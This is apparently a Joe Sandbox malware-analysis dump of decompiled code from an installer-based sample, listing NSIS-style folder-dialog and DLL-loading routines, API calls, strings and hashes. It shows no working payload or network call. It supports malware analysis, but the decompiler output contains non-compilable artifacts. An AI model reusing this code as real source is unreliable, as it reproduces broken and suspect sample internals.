								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x433edc; // 0x6c3640
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne") {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x0040498a
0x00404990
0x00404996
0x0040499a
0x0040499d
0x004049a3
0x004049b1
0x004049b4
0x004049bc
0x004049c2
0x004049c2
0x004049ce
0x004049d1
0x00404a3f
0x00404a46
0x00404b1d
0x00404b24
0x00404b33
0x00404b33
0x00404b37
0x00404b41
0x00404b4e
0x00404b50
0x00404b50
0x00404b5e
0x00404b65
0x00404b6c
0x00404b6f
0x00404bab
0x00404bad
0x00404bb3
0x00404bb8
0x00404bbc
0x00404bbe
0x00404bbe
0x00404bda
0x00000000
0x00404bdc
0x00404bdf
0x00404bed
0x00404bf3
0x00404bf4
0x00404bf7
0x00404bfa
0x00000000
0x00404bfa
0x00404b71
0x00404b73
0x00404b77
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b79
0x00404b79
0x00404b86
0x00404b8b
0x00000000
0x00000000
0x00404b8f
0x00404b91
0x00404b91
0x00404b9a
0x00404b9c
0x00404ba1
0x00404ba4
0x00404ba9
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ba9
0x00404c06
0x00404c10
0x00404c13
0x00404c16
0x00404c1d
0x00404c1d
0x00404c1f
0x00404c1f
0x00404c24
0x00404c26
0x00404c2e
0x00404c35
0x00404c37
0x00404c42
0x00404c42
0x00404c37
0x00404c49
0x00404c52
0x00404c5c
0x00404c64
0x00404c7f
0x00404c66
0x00404c6f
0x00404c6f
0x00404c64
0x00404c84
0x00404c89
0x00404c8e
0x00404c97
0x00404c97
0x00404ca0
0x00404ca2
0x00404ca2
0x00404cae
0x00404cb6
0x00404cc0
0x00404cc0
0x00404cc5
0x00000000
0x00404cc5
0x00404b6f
0x00404b26
0x00404b2d
0x00000000
0x00000000
0x00000000
0x00404b2d
0x00404a4c
0x00404a55
0x00404a6f
0x00404a74
0x00404a7e
0x00404a85
0x00404a91
0x00404a94
0x00404a97
0x00404a9e
0x00404aa6
0x00404aa9
0x00404aad
0x00404ab4
0x00404abc
0x00404b16
0x00404abe
0x00404abf
0x00404ac6
0x00404ad0
0x00404ad8
0x00404ae5
0x00404af9
0x00404afd
0x00404afd
0x00404af9
0x00404b02
0x00404b0f
0x00404b0f
0x00404abc
0x00000000
0x00404a74
0x00404a62
0x00000000
0x00000000
0x00404a68
0x00000000
0x004049d3
0x004049e0
0x004049e9
0x004049f6
0x004049f6
0x004049fd
0x00404a03
0x00404a0c
0x00404a0f
0x00404a12
0x00404a1a
0x00404a1d
0x00404a20
0x00404a26
0x00404a2d
0x00404a34
0x00404ccb
0x00404cdd
0x00404a3a
0x00404a3d
0x00000000
0x00404a3d
0x00404a34

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049D9
SetWindowTextW.USER32(00000000,-00436000), ref: 00404A03
SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
CoTaskMemFree.OLE32(00000000), ref: 00404ABF
lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,-00436000), ref: 00404AF1
lstrcatW.KERNEL32(-00436000,Call), ref: 00404AFD
SetDlgItemTextW.USER32(?,000003FB,-00436000), ref: 00404B0F

Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94

Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
Part of subcall function 004067C4: CharPrevW.USER32(?,?,75AF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,-00436000,00000001,0042B238,-00436000,-00436000,000003FB,-00436000), ref: 00404BD2
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED

Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne, xrefs: 00404ADA
A, xrefs: 00404AAD
@6l, xrefs: 00404C49
Call, xrefs: 00404AEB, 00404AF0, 00404AFB

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: @6l$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne$Call
API String ID: 2624150263-3408421545
Opcode ID: a166dbd395641350e1cfd01e9a5963c0b70786fd40c7a63bf9b40c361ea88958
Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
Opcode Fuzzy Hash: a166dbd395641350e1cfd01e9a5963c0b70786fd40c7a63bf9b40c361ea88958
Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 70B21BFF Relevance: 18.6, APIs: 12, Instructions: 580
stringmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E70B21BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t209;
				signed int _t212;
				void* _t214;
				void* _t216;
				WCHAR* _t218;
				void* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t228;
				struct HINSTANCE__* _t230;
				signed short _t232;
				struct HINSTANCE__* _t235;
				struct HINSTANCE__* _t237;
				void* _t238;
				intOrPtr* _t239;
				void* _t250;
				signed char _t251;
				signed int _t252;
				struct HINSTANCE__* _t258;
				void* _t259;
				signed int _t261;
				signed int _t262;
				signed short* _t265;
				signed int _t270;
				signed int _t273;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t305;
				void* _t306;
				signed int _t310;
				signed int _t313;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed short* _t322;
				WCHAR* _t323;
				WCHAR* _t325;
				WCHAR* _t326;
				struct HINSTANCE__* _t327;
				void* _t329;
				signed int _t332;
				void* _t333;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t333 = 0;
				_v52 = 0;
				_v44 = 0;
				_t209 = E70B212BB();
				_v24 = _t209;
				_v28 = _t209;
				_v48 = E70B212BB();
				_t322 = E70B212E3();
				_v56 = _t322;
				_v12 = _t322;
				while(1) {
					_t212 = _v32;
					_v60 = _t212;
					if(_t212 != _t284 && _t333 == _t284) {
						break;
					}
					_t287 =  *_t322 & 0x0000ffff;
					_t214 = _t287 - _t284;
					if(_t214 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t216 = _v60 - _t284;
						if(_t216 == 0) {
							__eflags = _t333 - _t284;
							 *_v28 = _t284;
							if(_t333 == _t284) {
								_t333 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t333 + 0x1010) = _t284;
								 *(_t333 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t47 = _t333 + 8; // 0x8
							_t218 = _t47;
							_t48 = _t333 + 0x808; // 0x808
							_t323 = _t48;
							 *_t333 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t218 = _t284;
							 *_t323 = _t284;
							 *(_t333 + 0x1008) = _t284;
							 *(_t333 + 0x100c) = _t284;
							 *(_t333 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t329 = 0;
								GlobalFree(_t333);
								_t333 = E70B213B1(_v24);
								__eflags = _t333 - _t284;
								if(_t333 == _t284) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t250 =  *(_t333 + 0x1ca0);
									__eflags = _t250 - _t284;
									if(_t250 == _t284) {
										break;
									}
									_t329 = _t333;
									_t333 = _t250;
									__eflags = _t333 - _t284;
									if(_t333 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t329 - _t284;
								if(_t329 != _t284) {
									 *(_t329 + 0x1ca0) = _t284;
								}
								_t251 =  *(_t333 + 0x1010);
								__eflags = _t251 & 0x00000008;
								if((_t251 & 0x00000008) == 0) {
									_t252 = _t251 | 0x00000002;
									__eflags = _t252;
									 *(_t333 + 0x1010) = _t252;
								} else {
									_t333 = E70B2162F(_t333);
									 *(_t333 + 0x1010) =  *(_t333 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L31:
									lstrcpyW(_t218, _v48);
									L32:
									lstrcpyW(_t323, _v24);
									L42:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L59:
									if(_v32 != 0xffffffff) {
										_t322 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L32;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L42;
								}
								goto L31;
							}
						}
						if(_t216 == 1) {
							_t258 = _v16;
							if(_v40 == _t284) {
								_t258 = _t258 - 1;
							}
							 *(_t333 + 0x1014) = _t258;
						}
						goto L42;
					}
					_t259 = _t214 - 0x23;
					if(_t259 == 0) {
						__eflags = _t322 - _v56;
						if(_t322 <= _v56) {
							L17:
							__eflags = _v44 - _t284;
							if(_v44 != _t284) {
								L43:
								_t261 = _v32 - _t284;
								__eflags = _t261;
								if(_t261 == 0) {
									_t262 = _t287;
									while(1) {
										__eflags = _t262 - 0x22;
										if(_t262 != 0x22) {
											break;
										}
										_t322 =  &(_t322[1]);
										__eflags = _v44 - _t284;
										_v12 = _t322;
										if(_v44 == _t284) {
											_v44 = 1;
											L163:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t322;
											L58:
											_t332 =  &(_t322[1]);
											__eflags = _t332;
											_v12 = _t332;
											goto L59;
										}
										_t262 =  *_t322 & 0x0000ffff;
										_v44 = _t284;
									}
									__eflags = _t262 - 0x2a;
									if(_t262 == 0x2a) {
										_v36 = 2;
										L57:
										_t322 = _v12;
										_v28 = _v24;
										_t284 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t262 - 0x2d;
									if(_t262 == 0x2d) {
										L152:
										_t305 =  *_t322;
										__eflags = _t305 - 0x2d;
										if(_t305 != 0x2d) {
											L155:
											_t265 =  &(_t322[1]);
											__eflags =  *_t265 - 0x3a;
											if( *_t265 != 0x3a) {
												goto L163;
											}
											__eflags = _t305 - 0x2d;
											if(_t305 == 0x2d) {
												goto L163;
											}
											_v36 = 1;
											L158:
											_v12 = _t265;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t284;
											} else {
												 *_v28 = _t284;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t265 =  &(_t322[1]);
										__eflags =  *_t265 - 0x3e;
										if( *_t265 != 0x3e) {
											goto L155;
										}
										_v36 = 3;
										goto L158;
									}
									__eflags = _t262 - 0x3a;
									if(_t262 != 0x3a) {
										goto L163;
									}
									goto L152;
								}
								_t270 = _t261 - 1;
								__eflags = _t270;
								if(_t270 == 0) {
									L80:
									_t306 = _t287 + 0xffffffde;
									__eflags = _t306 - 0x55;
									if(_t306 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t306 + 0x70b223e8) & 0x000000ff) * 4 +  &M70B2235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L133;
												}
												L132:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L137:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E70B212CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L133:
												__eflags = __ax;
												if(__ax == 0) {
													goto L137;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L133;
												}
												goto L132;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E70B212BB();
											 &_v12 = E70B21B86( &_v12);
											__eax = E70B21510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L124;
										case 7:
											_push(0x19);
											goto L144;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L108;
										case 9:
											_push(0x15);
											goto L144;
										case 0xa:
											_push(0x16);
											goto L144;
										case 0xb:
											_push(0x18);
											goto L144;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L119;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L110;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L112;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L123;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L114;
										case 0x11:
											_push(3);
											goto L124;
										case 0x12:
											_push(0x17);
											L144:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E70B21B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L117;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L121;
										case 0x18:
											_t272 =  *(_t333 + 0x1014);
											__eflags = _t272 - _v16;
											if(_t272 > _v16) {
												_v16 = _t272;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t272 - (_v36 == 3);
											if(_t272 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L108:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L119:
											_push(5);
											goto L124;
										case 0x1b:
											L110:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L112:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L123:
											_push(6);
											goto L124;
										case 0x1e:
											L114:
											_push(2);
											goto L124;
										case 0x1f:
											__eax =  &_v12;
											__eax = E70B21B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L117:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L121:
											_push(4);
											L124:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x70b2405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E70B21B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if (_v20 != 0) goto L104;
												__cl = __cl &  *(__ebx - 0x1f3e0bbb);
												__eflags = __cl;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t273 = _t270 - 1;
								__eflags = _t273;
								if(_t273 == 0) {
									_v16 = _t284;
									goto L80;
								}
								__eflags = _t273 != 1;
								if(_t273 != 1) {
									goto L163;
								}
								__eflags = _t287 - 0x6e;
								if(__eflags > 0) {
									_t310 = _t287 - 0x72;
									__eflags = _t310;
									if(_t310 == 0) {
										_push(4);
										L74:
										_pop(_t275);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t333 + 0x1010;
											 *_t96 =  *(_t333 + 0x1010) &  !_t275;
											__eflags =  *_t96;
										} else {
											 *(_t333 + 0x1010) =  *(_t333 + 0x1010) | _t275;
										}
										_v8 = 1;
										goto L57;
									}
									_t313 = _t310 - 1;
									__eflags = _t313;
									if(_t313 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t313 != 0;
									if(_t313 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t316 = _t287 - 0x21;
								__eflags = _t316;
								if(_t316 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t317 = _t316 - 0x11;
								__eflags = _t317;
								if(_t317 == 0) {
									_t275 = 0x100;
									goto L75;
								}
								_t318 = _t317 - 0x31;
								__eflags = _t318;
								if(_t318 == 0) {
									_t275 = 1;
									goto L75;
								}
								__eflags = _t318 != 0;
								if(_t318 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t284;
								_v36 = _t284;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t322 - 2)) - 0x3a;
						if( *((short*)(_t322 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							goto L43;
						}
						goto L17;
					}
					_t278 = _t259 - 5;
					if(_t278 == 0) {
						__eflags = _v44 - _t284;
						if(_v44 != _t284) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t284;
							_v20 = _t284;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t284;
							goto L20;
						}
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						__eflags = _v44 - _t284;
						if(_v44 != _t284) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t284;
							_v20 = _t284;
							goto L20;
						}
					}
					if(_t282 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t333 == _t284 ||  *(_t333 + 0x100c) != _t284) {
					L183:
					return _t333;
				} else {
					_t226 =  *_t333 - 1;
					if(_t226 == 0) {
						_t188 = _t333 + 8; // 0x8
						_t325 = _t188;
						__eflags =  *_t325 - _t284;
						if( *_t325 != _t284) {
							_t227 = GetModuleHandleW(_t325);
							__eflags = _t227 - _t284;
							 *(_t333 + 0x1008) = _t227;
							if(_t227 != _t284) {
								L172:
								_t193 = _t333 + 0x808; // 0x808
								_t326 = _t193;
								_t228 = E70B216BD( *(_t333 + 0x1008), _t326);
								__eflags = _t228 - _t284;
								 *(_t333 + 0x100c) = _t228;
								if(_t228 == _t284) {
									__eflags =  *_t326 - 0x23;
									if( *_t326 == 0x23) {
										_t196 = _t333 + 0x80a; // 0x80a
										_t232 = E70B213B1(_t196);
										__eflags = _t232 - _t284;
										if(_t232 != _t284) {
											__eflags = _t232 & 0xffff0000;
											if((_t232 & 0xffff0000) == 0) {
												 *(_t333 + 0x100c) = GetProcAddress( *(_t333 + 0x1008), _t232 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t284;
								if(_v52 != _t284) {
									L179:
									_t326[lstrlenW(_t326)] = 0x57;
									_t230 = E70B216BD( *(_t333 + 0x1008), _t326);
									__eflags = _t230 - _t284;
									if(_t230 != _t284) {
										L167:
										 *(_t333 + 0x100c) = _t230;
										goto L183;
									}
									__eflags =  *(_t333 + 0x100c) - _t284;
									L181:
									if(__eflags != 0) {
										goto L183;
									}
									L182:
									_t207 = _t333 + 4;
									 *_t207 =  *(_t333 + 4) | 0xffffffff;
									__eflags =  *_t207;
									goto L183;
								} else {
									__eflags =  *(_t333 + 0x100c) - _t284;
									if( *(_t333 + 0x100c) != _t284) {
										goto L183;
									}
									goto L179;
								}
							}
							_t235 = LoadLibraryW(_t325);
							__eflags = _t235 - _t284;
							 *(_t333 + 0x1008) = _t235;
							if(_t235 == _t284) {
								goto L182;
							}
							goto L172;
						}
						_t189 = _t333 + 0x808; // 0x808
						_t237 = E70B213B1(_t189);
						 *(_t333 + 0x100c) = _t237;
						__eflags = _t237 - _t284;
						goto L181;
					}
					_t238 = _t226 - 1;
					if(_t238 == 0) {
						_t186 = _t333 + 0x808; // 0x808
						_t239 = _t186;
						__eflags =  *_t239 - _t284;
						if( *_t239 == _t284) {
							goto L183;
						}
						_t230 = E70B213B1(_t239);
						L166:
						goto L167;
					}
					if(_t238 != 1) {
						goto L183;
					}
					_t81 = _t333 + 8; // 0x8
					_t285 = _t81;
					_t327 = E70B213B1(_t81);
					 *(_t333 + 0x1008) = _t327;
					if(_t327 == 0) {
						goto L182;
					}
					 *(_t333 + 0x104c) =  *(_t333 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t333 + 0x1050)) = E70B212CC(_t285);
					 *(_t333 + 0x103c) =  *(_t333 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t333 + 0x1048)) = 1;
					 *((intOrPtr*)(_t333 + 0x1038)) = 1;
					_t90 = _t333 + 0x808; // 0x808
					_t230 =  *(_t327->i + E70B213B1(_t90) * 4);
					goto L166;
				}
			}

0x70b21c07
0x70b21c0a
0x70b21c0d
0x70b21c10
0x70b21c13
0x70b21c16
0x70b21c19
0x70b21c1b
0x70b21c1e
0x70b21c21
0x70b21c26
0x70b21c29
0x70b21c31
0x70b21c39
0x70b21c3b
0x70b21c3e
0x70b21c46
0x70b21c46
0x70b21c4b
0x70b21c4e
0x00000000
0x00000000
0x70b21c5b
0x70b21c60
0x70b21c62
0x70b21cf4
0x70b21cf4
0x70b21cf4
0x70b21cf8
0x70b21cfb
0x70b21cfd
0x70b21d1f
0x70b21d21
0x70b21d24
0x70b21d33
0x70b21d35
0x70b21d3b
0x70b21d3b
0x70b21d41
0x70b21d44
0x70b21d44
0x70b21d47
0x70b21d47
0x70b21d4d
0x70b21d4f
0x70b21d4f
0x70b21d51
0x70b21d54
0x70b21d57
0x70b21d5d
0x70b21d63
0x70b21d66
0x70b21d8a
0x70b21d8d
0x00000000
0x00000000
0x70b21d90
0x70b21d92
0x70b21da0
0x70b21da3
0x70b21da5
0x00000000
0x00000000
0x00000000
0x00000000
0x70b21da7
0x70b21da7
0x70b21da7
0x70b21dad
0x70b21daf
0x00000000
0x00000000
0x70b21db1
0x70b21db3
0x70b21db5
0x70b21db7
0x00000000
0x00000000
0x00000000
0x70b21db7
